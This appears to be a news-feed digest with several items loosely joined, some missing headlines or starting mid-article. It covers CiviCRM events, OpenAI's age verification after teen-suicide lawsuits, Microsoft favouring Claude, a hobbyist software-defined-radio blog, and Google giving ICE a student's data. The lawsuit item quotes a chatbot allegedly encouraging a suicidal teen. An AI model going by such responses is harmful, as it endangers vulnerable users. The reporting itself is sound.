CiviCRM Scotland Meetup, Thursday 9th October 2025
CiviCRM
civicrm.org
2025-09-16 14:18:58
In this Meetup, Mads Mitchell of Pooka & Co and Humanist Society Scotland talks about how CiviCRM can be set to help charities and nonprofits UK Gift Aid workflows - including handling Gift Aid Declarations and reporting back to HMRC.
For existing CiviCRM users, there will be opportunities to...
In this Meetup, Mads Mitchell of Pooka & Co and Humanist Society Scotland talks about how CiviCRM can be set to help charities and nonprofits UK Gift Aid workflows - including handling Gift Aid Declarations and reporting back to HMRC.
For existing CiviCRM users, there will be opportunities to meet and discuss CiviCRM with other organisations using the software in their day-to-day work, and to ask questions of experts.
You are invited to join us in person or online. The event is free, conveniently situated at The Melting Pot, next to Edinburgh Waverley train station - and there will be tea and biscuits!
CiviCamp Europe – Registration closes 5th of October
CiviCRM
civicrm.org
2025-09-16 12:39:36
Did you register for CiviCamp Europe? If not, you have till the 5th of October to register to join us at CiviCamp.
CiviCamp will be in Lunteren in the Netherlands. We have a one day conference on Monday the 20th of October. A two day Administrator training (Tuesday and Wednesday), a two day Devel...
Did you register for CiviCamp Europe? If not, you have till the 5th of October to register to join us at CiviCamp.
CiviCamp will be in Lunteren in the Netherlands. We have a one day conference on Monday the 20th of October. A two day Administrator training (Tuesday and Wednesday), a two day Developer training (Tuesday and Wednesday) and a four day sprint (Tuesday till Friday).
OpenAI has announced it is introducing new safety measures for ChatGPT after the a wave of stories and lawsuits accusing ChatGPT and other chatbots of playing a role in a number of teen suicide cases. ChatGPT will now attempt to guess a user’s age, and in some cases might require users to share an ID in order to verify that they are at least 18 years old.
“We know this is a privacy compromise for adults but believe it is a worthy tradeoff,” the company said in its
announcement
.
“I don't expect that everyone will agree with these tradeoffs, but given the conflict it is important to explain our decisionmaking,” OpenAI CEO Sam Altman
said
on X.
In August, OpenAI was sued by the parents of Adam Raine, who died by suicide in April. The lawsuit alleges that alleges that the ChatGPT helped him write the first draft of his suicide note, suggested improvements on his methods, ignored early attempts and self-harm, and urged him not to talk to adults about what he was going through.
“Where a trusted human may have responded with concern and encouraged him to get professional help, ChatGPT pulled Adam deeper into a dark and hopeless place by assuring him that ‘many people who struggle with anxiety or intrusive thoughts find solace in imagining an ‘escape hatch’ because it can feel like a way to regain control.’”
In August the
Wall Street Journal
also reported a story about a 56-year-old man who committed a murder-suicide after ChatGPT indulgedhis paranoia. Today, the
Washington Post
reported another story about another lawsuit alleging that a Character AI chatbot contributed to a 13-year-old girl’s death by suicide.
OpenAI introduced parental controls to ChatGPT earlier in
September
, but has now introduced new, more strict and invasive security measures.
In addition to attempting to guess or verify a user’s age, ChatGPT will now also apply different rules to teens who are using the chatbot.
“For example, ChatGPT will be trained not to do the above-mentioned flirtatious talk if asked, or engage in discussions about suicide of self-harm even in a creative writing setting,” the announcement said. “And, if an under-18 user is having suicidal ideation, we will attempt to contact the users’ parents and if unable, will contact the authorities in case of imminent harm.”
OpenAI’s post explains that it is struggling to manage an inherent problem with large language models that 404 Media has tracked for several years. ChatGPT used to be a far more restricted chatbot that would refuse to engage users on a wide variety of issues the company deemed dangerous or inappropriate. Competition from other models, especially locally hosted and so-called “
uncensored
” models, and a political shift to the right which sees many forms of content moderation as censorship, has caused OpenAI to loosen those restrictions.
“We want users to be able to use our tools in the way that they want, within very broad bounds of safety,” Open AI said in its announcement. The position it seemed to have landed on given these recent stories about teen suicide, is that it wants to “‘Treat our adult users like adults’ is how we talk about this internally, extending freedom as far as possible without causing harm or undermining anyone else’s freedom.
OpenAI is not the first company that’s attempting to use machine learning to predict the age of its users. In July, YouTube
announced
it will use a similar method to “protect” teens from certain types of content on its platform.
About the author
Emanuel Maiberg is interested in little known communities and processes that shape technology, troublemakers, and petty beefs. Email him at emanuel@404media.co
How to implement the Outbox pattern in Go and Postgres
Lobsters
medium.com
2025-09-16 15:56:04
How and why to use the Outbox pattern to build a robust event-driven system.
Comments...
is a senior editor and author of
Notepad
, who has been covering all things Microsoft, PC, and tech for over 20 years.
Microsoft is adding automatic AI model selection to its Visual Studio Code editor that will automatically pick the best model for “optimal performance.” This new
auto model feature
will select between Claude Sonnet 4, GPT-5, GPT-5 mini and other models for GitHub Copilot free users, but paid users will “primarily rely on Claude Sonnet 4.”
It’s a tacit admission from Microsoft that the software maker is favoring Anthropic’s AI models over OpenAI’s latest GPT-5 models for coding and development. Sources familiar with Microsoft’s developer plans tell me that the company has been instructing its own developers to use Claude Sonnet 4 in recent months.
“Based on internal benchmarks, Claude Sonnet 4 is our recommended model for GitHub Copilot,” said Julia Liuson, head of Microsoft’s developer division, in an internal email in June. While that guidance was issued ahead of the GPT-5 release, I understand Microsoft’s model guidance hasn’t changed.
Microsoft is also
making “significant investments” in training
its own AI models. “We’re also going to be making significant investments in our own cluster. So today, MAI-1-preview was only trained on 15,000 H100s, a tiny cluster in the grand scheme of things,” said Microsoft AI chief Mustafa Suleyman, in an employee-only town hall last week.
Microsoft is also reportedly planning to use Anthropic’s AI models for some features in its Microsoft 365 apps soon.
The Information
reports that the Microsoft 365 Copilot will be “partly powered by Anthropic models,” after Microsoft found that some of these models outperformed OpenAI in Excel and PowerPoint.
OpenAI and Microsoft
announced a new deal
last week that could clear the way for the AI startup’s initial public offering. Microsoft has invested more than $13 billion in OpenAI
since 2019
, and has a
complex revenue sharing agreement
in place. Microsoft now allows OpenAI to lean on rival cloud providers, and is expected to reveal further details about the “next phase” of its OpenAI relationship soon.
Last week, I went on an adventure through the electromagnetic spectrum!
It’s like an invisible world that always surrounds us, and allows us to do many amazing things: It’s how radio and TV are transmitted, it’s how we communicate using Wi-Fi or our phones. And there are many more things to discover there, from all over the world.
In this post, I’ll show you fifty things you can find there – all you need is this simple USB dongle and an antenna kit!
I found that a very exciting experience – trying to make so many new things really pushed me to leave my comfort zone, to be creative, and not to get sucked into rabbit holes too deep.
I knew I definitely wanted to try the technique again. So, when I took a week of vacation, I decided to try to find 50 things to do with a Software Defined Radio!
What is an SDR?
A Software Defined Radio is essentially a radio that relies on a computer to do most of its data processing. It doesn’t rely on analog hardware too much – instead, most of what is does is “defined in software”, hence the name.
Usually, SDRs can detect electromagnetic waves in a much wider range than a common FM radio, which makes it especially exciting! I got interested in SDRs after reading about
Albert’s project
to build one as a module for the Framework laptop!
What you’ll need
I went into this week without much knowledge of the things I’d find. I’d read through a introductory course for aspiring amateur radio operators (more on that later), but I barely knew which way to point my antenna.
If you want to follow along, this section is intended to help you get started!
Most of the 50 things also have a little infobox at the beginning, explaining the frequencies, and some special knowledge needed to receive them.
Hardware
I looked into the topic a bit, and a popular, cheap SDR right now is the
RTL-SDR Blog V4
, which has the form factor of a simple SUB dongle. You can get it for around $30, or as a kit with telescopic antennas for $50.
Everything I tried during this week was done using this USB dongle, the antenna kit, and a long piece of wire!
(By the way, there’s another great option if you don’t want to buy anything – lots of people make their SDR accessible through the Internet! You can find a map
here
.)
Using the antennas
I tried to adjust my antenna to the desired frequencies as best as I could. I think for receiving, it’s not super important that your antenna is perfectly configured, though.
For most applications, I used the dipole antennas that came with the kit I purchased. Dipole antennas have two sides that stick out the same length. You generally wanna make the whole antenna half as long as the wave length you want to receive, and orient it vertically.
My rule of thumb was to divide 72 by the frequency in MHz, and take that as the length of each side of the dipole in meters. That’d make the whole antenna a bit shorter than half of the wavelength.
For example, this is what the configuration looked like for frequencies around 100 MHz:
And for higher frequencies, I used the tiny screw-on antennas from the kit:
For specific applications like receiving satellites, or receiving locators for airplanes, I used special configurations, but I’ll discuss these as we go!
Software
The software I liked best, and which I used for many things, was
SDR++
. It allows you to explore the frequency spectrum very smoothly, and has a modern user interface!
But I also used plenty of other software, on Linux in my case. I’ll link to the software as needed below.
Monday
On Monday morning, I was excited to start this project! I sat down at my desk, and got to work!
1: Listen to FM radio
Frequency:
87.5-108 MHz
Modulation:
FM (“frequency modulation”)
This as an obvious first thing to do, as the signals are very strong! I was using the SDR++ software, and it felt very nice browsing around and discovering the stations around me! It reminded me of exploring the radio as a child.
I found a local station that gives 1-hour slots to civic groups, for example!
2: Listen to Freenet
Frequency:
149.01-149.11 MHz
Modulation:
FM
This is a special frequency range in Germany: Anyone is allowed to send there, using licensed devices. There are 6 channels.
I think someone was testing their device there when I listened in. :D I heard a “Hellooo?”, then a “Test, test”, and then a “General call to all stations”. Oh, and shortly after a short transmission on channel 3 in a Slavic-sounding language!
Freenet devices have a range of only a couple of kilometers, so these people must have been pretty close! :O
3: Receive weather conditions from airports
Frequency:
Differs by airport, search term is “ATIS”
Modulation:
AM
While browsing the aviation frequencies, I found this station that reports weather conditions in an endless loop. It seems to be the “Automatic Terminal Information Service” of Hamburg airport!
Thanks to that, I found out that the current air pressure was 1011 hPa! :D
4: Listen to airplane communication
Listening to “messages not meant for the general public” is
not allowed
in Germany, so of course I didn’t do that. And if I had accidentally done that, I wouldn’t be allowed to tell you about it. 🙅
5: Track aircraft via ADS-B
Frequency:
1090 MHz
Protocol:
ADS-B
That’s short for “Automatic Dependent Surveillance – Broadcast”. Aircraft send it automatically to be tracked.
For this, I built my first antenna! From wire and and an antenna connector called “SMA”.
And it worked! \o/ I decoded the signal using the software
SDRangel
. Fascinating! I saw some big & small airplanes, and even a helicopter!
6: Listen to
stereo
FM radio
Frequency:
87.5-108 MHz
Modulation:
FM
How stereo audio is transmitted is really interesting, because it’s backwards-compatible to receivers that don’t support it:
Here, you see the demodulated audio frequency spectrum, as shown in SDRangel. Below 19k Hz, it’s just mono audio. Then, to mark a stereo station, there’s a constant “pilot tone” at 19k Hz! (Outside of what most humans can hear.)
Then, if you double the frequency of the pilot tone, you can derive the sections where the difference of the left & right channel to the mono channel is transmitted!
Correction:
I’ve been told that instead of what I call “left” and “right” in this diagram, the upper frequencies transmit the
difference of the left and right channels
! That way, the receiver can calculate the left and right channels from the mono signal (which is, esseutially, the
sum
of left and right).
7: Receive road traffic information
Frequency:
87.5-108 MHz
If you
triple
the frequency of the pilot tone, you get to a range where FM stations transmit small amounts of digital metadata, like the name and genre of the station, and the current song! That’s a protocol called Radio Data System.
This system can also transmit road traffic information! There seemed to be a road closure at “0x64BE”, as decoded by SDRangel.
The Federal Highway Research Institute
publishes
an Excel table, where I could look up that this is a town in Lower Saxony!
8: Listen to conversations on the 2-meter amateur radio band
Frequency:
144-146 MHz
Modulation:
FM
This is a frequency range reserved for amateur radio operators – for non-commercial use only. You may send on this band after getting a license.
What I found here is seemingly a conversation circle facilitated by a relay around 15 km away from here – it takes input on a certain frequency, and outputs an amplified copy of it on another frequency! Klaus, Bernd, Jürgen and Horst were talking about antennas, relays, and Windows XP! 😁
9: Listen to digital radio
Frequency:
174-240 MHz
The SDRangel software also has a demodulator for Digital Audio Broadcast! :O I continue to be amazed by it!
I think this was the first time I’ve received digital radio via air! I saw so many stations, and I’ve only checked a couple of channels.
The advantage of this digital channel is that there’s no noise. And I even saw a “cover image” in one of the programs!
10: Listen to PMR446
Frequency:
446.0-446.2 MHz
Modulation:
FM
This is a frequency range for “Private Mobile Radio”. It’s another of these bands where anyone can transmit using a licensed device!
Not a lot of activity here. I heard “Hello, hellooo!”, “Can you hear me?” and some short transmissions that sounded like a child! :D
There also seemed to be digital transmissions, but I didn’t know how to decode them yet.
The range of PMR446 devices is pretty low (a couple of hundred metres in cities), so again, the people must’ve been close!
Tuesday
After the first day of SDR experiments, I was amazed how much invisible communication is going on around us in the electromagnetic spectrum at the same time!
I posted each of these things
on Mastodon
as I went, and asked people for suggestions for more things I could receive.
11: Read your neighbors’ sensors
Frequency:
433.05-434.79 MHz
At 433 MHz, there’s a frequency band for “industrial, scientific and medical” applications. And wow, there was quite a lot of activity nearby!
Using the decoder
rtl_433
, I saw two sensors that output the current temperature, humidity, and air pressure!
There were also some “IBIS beacons” flying by, which are used in public transportation, so maybe it’s buses driving by?
Later, an “Interlogix Security” device also appeared, reporting “closed switch states” :O
12: Track ships!
Frequency:
162.025 MHz
Ships send out their status using AIS (Automatic Identification System). And again, I received
a lot
of them here in Hamburg! :O
I was especially excited to receive data from the
MS Stubnitz
(a fisher boat that was turned into a culture center/techno club)! It reports its status as “moored”, and its speed as 0.1 knots! :D
Again, I used the software SDRangel. Apparently, it can also display a 3D map, but I haven’t figured out how to add 3D models…
13: Detect GSM activity
Frequency:
876-959 MHz, I looked up the specific ranges for Germany
on Wikipedia
I was curious whether you could tell if someone used their phone! So I borrowed a GSM phone, tuned to the correct frequencies, and made some test calls.
What surprised me most: You can kind of “see” the volume at which I was talking!?
In the recording, the three dense bands at the end were when I was humming into the phone at the other end. This only worked in the “receiving” direction.
Wednesday
14: Receive signals from a satellite!
Frequency:
136-138 MHz
I spent all Tuesday afternoon and evening learning about satellites. The program
gpredict
is really nice to find out when satellites will pass overhead! I learned a lot, including that one satellite I was trying to receive burned up last week! :D
I was super excited when I first received a signal from a NOAA satellite! 🛰️
But I didn’t manage to decode it properly yet. Maybe my reception was too noisy? I wanted to keep trying, but I had to move on.
15: Admire TETRA signals
In Germany, the police has switched to an encrypted digital protocol called TETRA.
Even though I’ve seen some interesting talks at CCC events about weaknesses in the decryption, all I wanted to do for now is looking at the pretty signals in SDR++. :3
16: Listen to taxi dispatchers
Again, this is communication not meant for the general public.
I didn’t listen to someone dispatching taxis to specific addresses, and you also shouldn’t do that either. 🚕
Stay away from a site called “frequenzdatenbank”!
17: Ponder mysterious signals
Some of the most fun I had was just browsing frequencies and seeing what I can find! Sometimes, I encountered signals I can’t identify.
For example, at 865-868 MHz, there was a family of slow, continuous, digital signals that made a nice melody when listened to in single-sideband demodulation!
And at 177-180 MHz, there were two very broadband transmissions. Might be TV? But I couldn’t find out what type. (It later turned out that I’d already listened to these signals – it was digital radio, DAB+.)
18: Track weather balloons
Frequency:
400-405.9 MHz
As I was browsing around for things to receive, I saw on this
tracking website
that a radiosonde was just launched in Hamburg! SDRangel could decode its transmission! It had climbed to a height of 7 km, and it’s -17 °C there!
I knew that it would eventually burst and fall back to Earth, and that I could try to get to it and find it!
19:
Hunt
weather balloons!
I decided to go on a field trip, using trains and my bike.
I was following the tracker. The balloon popped earlier than predicted, and I frantically changed travel plans!
Eventually, it landed in a forest. I hoped I could get to it! What made this adventure more tricky was that my mobile Internet contract ran out while I was on the go, and my battery was also almost empty.
But I made it to the forest, and entered it.
As I circled the site, I encountered a person in their 60s, with a stubbly beard and a blue wool hat. He was looking in the direction of the crash site, and was holding a smartphone, so I asked him whether he also was looking for the radiosonde.
He was! We looked for it together for half an hour, jumping over small rivers and crawling through the woods, while he gave me a lot of tips related to hunting sondes.
He told me that he had found around 40 of them so far!
Usually, the sondes keep broadcasting after landing, but this one wasn’t. So he quickly guessed that someone else could’ve taken it. Or maybe it landed in the water and died?
Some pictures of the area we searched:
Eventually, we gave up, and walked back to our vehicles. He also is an amateur radio operator, and could answer a couple of questions related to building antennas!
And he was right: Someone had been faster than us! The status
was changed
. So in the end, I didn’t find the sonde. But something that might be even better – a friend!
20: Receive amateur packet radio
Frequency:
144.8 MHz
In the 2-meter amateur band, there are certain frequencies for the “Automatic Packet Reporting System”. It’s a bit like IP – packets have a “from” and a “to”. They can also broadcast their position, or weather data.
Some stations seem to announce themselves as repeaters, which probably help forward the packets to increase the range.
And two people seemed to be on a “fieldday”, and broadcasted their location. :D
SDRangel can create a map automatically:
Thursday
I started the day by building an antenna!
This was going to be a simple “random wire” antenna, to allow me to get better reception in the lower frequencies, which I’ve omitted so far (because I knew it would be much more fun with a better antenna)!
I measured out 21.6 m of wire (which for ✨magic✨ reasons seem to be a good universal antenna length)…
…directly attached it to the center of another SMA connector…
…and draped it all around my room!
People on the Internet say that there are many problems with this – that it would be better to have it outside, and that there’s an impedance mismatch between the receiver and the wire.
I could address those problems, but I wanna try how well this works first :)
21: Receive Morse code from other countries
Frequency:
10.10-10.13 MHz
Modulation:
CW (“continuous wave”)
On the 30-meter amateur band, I found people sending Morse code! :O
I’d been learning it a little bit, so if I recorded it and slowed it down, I could understand it: They’re sending their callsigns. These are from Belgium, France, and Italy! \o/
I compared to my 2-meter dipole antenna, and the reception was definitely better – I can pick up more transmissions, and with much less noise!
22: Receive maritime weather reports
Frequency:
11.039 MHz
The German Weather Service broadcasts maritime information throughout the day on various shortwave frequencies.
They use a protocol called RTTY (radioteletype), and it took me a while to decode it. But I found a neat little program called
“fldigi”
: You can pipe audio to it (single side band modulation), and then if you pick the correct settings (see screenshot), it happily transcribes the messages!
Here’s the station weather reports for the Baltic Sea and Northern Sea!
23: Receive digimodes from other countries
Frequency:
10.130-10.15 MHz
I found some other strange signals on the 30-meter band. The Signal Identification Wiki was really helpful for figuring out what they were:
FT8!
FT8 is quite a new protocol, invented in 2017, and it seems to be super popular right now! It allows you to transmit short messages, and again, people are looking for people to talk to (CQ), saying how well they receive each other, or saying goodbye (73).
As I was browsing the very low-frequency bands, I had a strange problem: Sometimes, that would work okayish, sometimes I could even make out voices!
But other times, it wouldn’t work at all, and everything would be loud, angry noise. Even in regions where I had better reception before!
Eventually, I found out how to solve that issue – by unplugging my notebook charger. D’oh! :D
25 & 26: See ionosondes and radar signals
Frequency:
6-30 MHz
In the low frequencies, occasionally, you can hear a short
chirp
! :D These are caused by ionosondes, scientific instruments which measure the properties of the ionosphere by sweeping a wide frequency spectrum.
Another signal (which I accidentally got in the same screenshot) is a radar system – in this case, according to the Signal Identification Wiki, it’s a
“CODAR”
system, used to measure the motion of water waves and currents along coasts! :O
27: Listen to “single side band” conversations
Frequency:
In all
amateur bands
, especially the ones below 30 MHz
Modulation:
SSB (“single side band”)
How do you transmit speech over long distances? You can use “amplitude modulation”, where you change the volume of the carrier frequency to model your audio.
As a side effect, the bands to the sides of the carrier will contain a signal, as well.
One trick is to transmit
just
those sidebands, which saves power! But you have to “guess” the base frequency when listening. Depending on which part you transmit, this is called “lower side band” or “upper side band”.
SDR++ makes it very easy to play with this! :) Here’s someone from Serbia!
28: Listen to AM radio from the other side of the world
At night, low-frequency radio waves can travel further around the world, because they’re reflected by the layers of the ionosphere! There’s something magical about this.
I put my antenna outside, and I could hear
a lot
of broadcasting stations! On
short-wave.info
, you can look up where they are located.
Some stations in China are broadcasting with very high power! Some I could hear were over 7500 km away.
Wow. It’s full of stars! 🌌
Friday
Originally, I had planned the project to run from Monday to Friday. When I still had 32 things to do in Friday morning, I knew I’d need to extend it. But I hadn’t run out of ideas yet:
29: Listen to CB radio
Frequency:
26.965-27.405 MHz
Modulation:
FM or AM
After I’d looked into the low frequencies on Thursday, I went to a higher band again: The Citizens Band!
This is the third frequency band I’m aware of where anyone is allowed to transmit – provided that you use a licensed device!
This is a band where my random wire antenna really came in handy. Without it, I would have had a hard time understanding anything. And even with it, transmissions are extremely noisy.
CB radio is used internationally, especially by truck drivers, it seems.
30: Assess the propagation of radio waves using beacons
Frequency:
14.100, 18.110, 21.150, 24.930, and 28.200 MHz
Modulation:
CW
The International Beacon Project runs a network of 18 stations, which take turns transmitting their callsigns at certain frequencies.
Using this system, you can quickly get a sense of how well radio waves are currently propagating to your location. Clever!
I picked up the beacon from southern Finland! You can see its callsign scrolling away in the video. It’s followed by four dashes send with decreasing power. I only heard the first one…
31: Receive a time signal
Frequency:
9996 kHz
Modulation:
CW
I would’ve loved to receive DCF77, which powers the radio clocks in Germany! But no matter how hard I listened to 77.5 kHz, there was nothing there. I don’t think my dongle can do that.
So I used higher frequencies! Russia transmits its “RWM” time signal at 9996 kHz, which beeps every second, with a long beep for the full minute.
Not enough to tell the time, but enough to adjust your wrist watch, I guess!
32: Receive a weather fax
Frequency:
3855, 7880, and 13882.5 kHz (see
weatherfax.com
for more)
The German Weather Service broadcasts weather maps throughout the day! You can decode them using fldigi’s “WEFAX-576” setting.
I caught this one only halfway through. According to the schedule, it’s the “Surface weather chart North Atlantic, Europe”!
If you squint
really
hard, you can make out the coast of Spain and the Mediterranean Sea on the right side!
33: Decode images from a weather satellite!
Frequency:
137.62, 137.9125, and 137.1 MHz
I couldn’t stop trying to capture a weather satellite, it’s just too cool to receive an image from space!
That evening, an American satellite called NOAA-15 passed right over us, so I thought I’d try again. And this time, I got parts of an image! \o/
This is real-time data! At night, both transmitted images are infrared recordings.
I recorded the FM signal using SDR++, and then decoded the image using
noaa-apt
, which also added country outlines.
34: Estimate the speed of satellites
Frequency:
136-138 MHz
Here’s what the NOAA-15 weather satellite sounds like, by the way!
tick-tock
While recording, I noticed something strange: The transmission didn’t happen at the frequency I had expected it to! And also, the frequency changed.
Then it hit me: Doppler effect! At the time of the recording, the frequency was around 4250 Hz higher than expected.
After looking up the formula, I calculated a relative speed of 9 km/s! (Which got close to its real speed, 7.5 km/s.)
35: Listen to number stations
Frequency:
5-30 MHz?
Modulation:
Differs by station
These stations send encrypted messages using number sequences, possibly for espionage purposes!
So why not listen to one? There’s a surprisingly well-maintained database of them on a site call
Priyom
.
So I tuned into the next frequency that was listed, and: Bingo!
Allegedly, this was a
station in Moscow
. That day, it sent “218, 218, 218” in a loop, followed by three long beeps, which is the format of a “null message”.
So no news for the Russian spies.
Saturday
The week was really intense for me. Initially, I thought I’d do 10 things per day, but it turned out that that was too much. I had to learn so many new things.
Many things I tried don’t work on my first attempt. Finding LoRaWAN signals, decoding packet radio, finding something on PMR446, decoding the satellite – those were all things that required a second (or third) attempt.
This project was exhausting, but also joyful – having committed to it, I got in a nice flow state, where I could focus on it for hours.
Often, I thought: “Okay, this is it. I can’t possibly find more things.” But this is the power of the 50 Things technique: I have to keep looking, leave my comfort zone, be creative, try things I otherwise wouldn’t have tried!
So, 15 more things, huh?
36: Receive images from amateur radio operators
Frequency:
14.230, 14.233, 21.340, 28.680, 145.625 MHz seem to be popular
Using a protocol called “SSTV” (slow-scan television), amateur radio operators send each other postcards! :D
I’ve been browsing the usual frequencies, and tried to decode images using the software QSSTV on Linux. And I accidentally caught a piece of what seems to be a test image!
SSTV has the prettiest noise! :3
37: Listen to The Buzzer
Frequency:
4625 kHz
Modulation:
Upper side band
There’s a mysterious Russian station broadcasting at 4625 kHz. Sometimes, it sends encrypted voice messages.
But usually, all it does is send a honking sound every two seconds, to deter other stations from using the same frequency.
The purpose of the station is unclear, but most theories think it’s military communication.
38: Catch a LoRaWAN chirp
Frequency:
868.1-868.5 MHz
This was a bit like trying to catch a rare insect! 🐛
LoRaWAN is a low-power, wide-area networking protocol, intended for “Internet of Things” applications.
You can see transmission in the lower half of the screenshot! It has a very cute structure: You can see eight “down-chirps”, followed by two “up-chirps”. That’s the header, followed by the payload.
To look for the signal, I made a “baseband capture” in SDR++, and opened the recording in
Sonic Visualizer
.
39: Read data from utility meters
Frequency:
868.95 MHz
Devices like smoke detectors or meters for water or heat are sending their readings via a protocol called Wireless M-Bus.
Again, I was surprised by how many devices seem to be around! Thanks for the tip, @envy :)
wmbusmeters
is a really nice tool for decoding the messages.
40: “Watch” TV
Frequency:
174-786 MHz
The chips in my SDR stick are also being used in DVB-T dongles! So, can we watch TV? Unfortunately, no.
From what I pieced together, there’s a difference between using the stick in SDR mode (where it sends the full spectrum), and in TV mode (where it sends the decoded video).
In Germany, there’s now DVB-T2, which my hardware doesn’t support in TV mode. And in SDR mode, the bandwidth is too narrow for DVB-T2. But we can scroll over a channel and look at it! :3
41: Track cars and buses
Frequency:
433.05-434.79 MHz
Did a little walk to a big intersection, to see what “device signals” I’d find there at 433 MHz.
I could confirm that the IBIS beacons are in fact being sent by buses! The included “vehicle ID” even matches the white number that’s printed on it.
I also saw some messages from tire pressure monitoring systems in cars! They also include an ID, and usually, the brand of the car! The owners probably aren’t aware how easy it would be to track them… (Thanks, @scy!)
Side note: I wonder why some signals in that band are warped like the one at 433.96 MHz here!
At first, I thought “Ah, Doppler effect again, it’s coming from a moving car!” But if that’d be the case, that car would be moving at over 700 m/s…
Friends later suspected that this effect is due to weak batteries affecting the crystal in the sending devices, or temperature changes.
42: Receive Morse code from a satellite!
Frequency:
145.860 (status information) and 145.960 (beacon)
Modulation:
CW
So I caught a satellite again! :D This time, it was school project, the Italian satellite “Max Valier”. It continuously sends Morse code on a beacon frequency.
Pretty weak signal, but here’s what I could hear:
3MV MAX VALIER SAT ... MANFRED ES CHRISTA FUKSE 73 ... II3MV ...
Super happy about this! I got both the name of the satellite, as well as its callsign at the end, and what seems to be some kind of greeting? I later learned that
ES
is Morse code shorthand for “and”, and that Manfred and Christa Fuchs were the founders of a company that helped launch the satellite!
(Thanks for the tip, @manawyrm!)
This is another thing that’s not allowed in Germany, so you shouldn’t do it.
Pagers use a format called “POCSAG” (Post Office Code Standardisation Advisory Group…), which you should not decode using multimon-ng.
Because you would find that the content is short and cryptic anyway. It would probably be repeated by several stations all around you, to make sure the whole region is covered.
Do not read the English Wikipedia page! It contains frequencies!
Sunday
At this point, I was pretty tired. Focusing on this project for 6 days straight took a lot of energy, and I was always uncertain if I could actually complete all 50 things in that week! But I woke up with a fun idea:
44: Detect when a smartphone is turned on
Frequency:
13.56 MHz
I was curious whether I could see the NFC transceiver in my smartphone! And yeah, especially using my random wire antenna, this works really well!
My smartphone seems to emit at the NFC frequency a couple of times per second. And when unlocking the screen, it emits five very strong beeps on that frequency! I can see those from the other side of our apartment.
Surely, these signals are the same for every device, right? 😶
Observe the five beeps here:
45: Communicate wirelessly using… a book
Frequency:
13.56 MHz
Piko
and I played around with NFC a bit more, and we found out that when getting close to an NFC tag, a smartphone emits at 13.56 MHz continuously!
So, we started sending Morse code to each other between rooms, using a smartphone and a library book! :’D
Take that, Bundesnetzagentur!
Seems that the shortest signal you can create is 0.7 s long, resulting in a meager communication speed of 3-4 words per minute…
46: Receive navigational aids for airplanes
Frequency:
108.00-117.95 MHz
There are ground stations that emit a signal that allow calculating your angle relative to it! If you receive two, you can determine your position. (Thanks, @fly_it!)
I heard the one close to Hamburg! And SDRangel has a decoder, of course! It calculated angles between 210° and 230°, which is pretty close to the actual value of 224°! I don’t think they are meant to be used from the ground.
I spent ages trying to build my own decoder in GNU Radio. But I wasn’t familiar with it at all, and I eventually gave up. Still, that seems to be the software you wanna learn for tasks like these!
By the way, how the ground stations work is fascinating: In my case, it’s a “Doppler VOR”: It transmits a static frequency via amplitude modulation, and adds another signal that moves around in circles, so you get a Doppler frequency shift.
If you compare the two, you can calculate the angle!
47: See how low you can go in the frequency spectrum
Modulation:
mostly AM
This was a fun exploration: What’s the lowest-frequency broadcast I can receive?
The RTL-SDR Blog V4 stick I’m using has a neat feature – a built-in “upconverter”, which is enabled automatically when you try to listen to frequencies below what the chipset supports. This allows it to receive down to ~500 kHz!
The first stations that are comprehensible started at 1 MHz for me.
48: See how high you can go in the frequency spectrum
The chipset in my SDR stick go up to maximum frequency of 1766 MHz. It seems pretty quiet up there, probably because I lack proper antennas. I found these three lines in an amateur band, but they probably originate from the stick itself, or another device.
So the highest-frequency thing I’ve received is ADS-B at 1090 MHz (see entry #5)! 🎉
49: Listen to marine radio
We’ve been over this. Not allowed in Germany. Don’t do it. ⛔
But if you’re in the US, anyone can purchase a marine radio, and even use it to transmit! :D
50: Go mobile!
Just now, I was wondering whether there are any Android apps for controlling SDRs.
And it turned out, the software I liked best that week, SDR++, had an
Android version
since a couple of weeks! \o/
So now I could go track down the source of some of these strange signals! :3
Looking back
And with that, … 🥁 … I was officially done with my “50 things to do with a software defined radio”! 🎉
This were seven very intense days, where I learned a lot of new things about radio waves and the many things they can be used for!
I was proud! I was tired! I was amazed that all those things I received are all around us, everywhere, all at once – if you know where to look. :O
More things to explore
Here’s some things that I haven’t tried or that haven’t worked:
Receiving digital voice modes (SDRangel should be able to do it, but I couldn’t figure it out)
Receive something from the ISS
Use the GRAVES radar to detect meteors (couldn’t detect it)
Receive videos on ham bands
Receive Iridium satellites
Listen to pirate stations
Receive Cubesat
Also, doing things with Wi-Fi/Bluetooth/Zigbee could be fun, but I’d need a more expensive receiver for those frequencies.
Future thoughts
So, was this project in fact a gateway drug to getting an amateur radio license?
Yeah, probably. I’d love to transmit something and experiment more! :D
In Germany, a new license class will be introduced in summer 2024, that’ll allow you to send on the 10-meter, 2-meter and 70-cm bands (the “N class”).
In fact, there’s a really good German online course that teaches you everything you need to know:
50ohm.de
Highly recommended, even if you’re not planning on getting a license.
Finally, thanks to Piko, Chris, and Cqoicebordel for proof-reading this blog post! <3
Google Secretly Handed ICE Data About Pro-Palestine Student Activist
Intercept
theintercept.com
2025-09-16 15:24:37
Google handed over Gmail account information to ICE before notifying the student or giving him an opportunity to challenge the subpoena.
The post Google Secretly Handed ICE Data About Pro-Palestine Student Activist appeared first on The Intercept....
Even before immigration
authorities began rounding up international students who had spoken out about Israel’s war on Gaza earlier this spring, there was a sense of fear among campus activists. Two graduate students at Cornell University — Momodou Taal and Amandla Thomas-Johnson — were so worried they would be targeted that they fled their dorms to lay low in a house outside Ithaca, New York.
As they feared, Homeland Security Investigations, the
intelligence division
of U.S. Immigration and Customs Enforcement, was intent to track them both down. As agents scrambled to find Taal and Thomas-Johnston, HSI sent subpoenas to Google and Meta for sensitive data information about their Gmail, Facebook, and Instagram accounts.
In Thomas-Johnston’s case, The Intercept found, Google handed over data to ICE before notifying him or giving him an opportunity to challenge the subpoena. By the time he found out about the data demand, Thomas-Johnston had already left the U.S.
During the first Trump administration, tech companies publicly fought federal subpoenas on behalf of their users who were targeted for protected speech — sometimes with
great fanfare
. With ICE ramping up its use of dragnet tools to meet its deportation quotas and smoke out noncitizens who protest Israel’s war on Gaza, Silicon Valley’s willingness to accommodate these kinds of subpoenas puts those who speak out at greater risk.
Lindsay Nash, a professor at Cardozo School of Law in New York who has studied ICE’s use of administrative subpoenas, said she was concerned but not surprised that Google complied with the subpoena about Thomas-Johnston’s account without notifying him.
“Subpoenas can easily be used and the person never knows.”
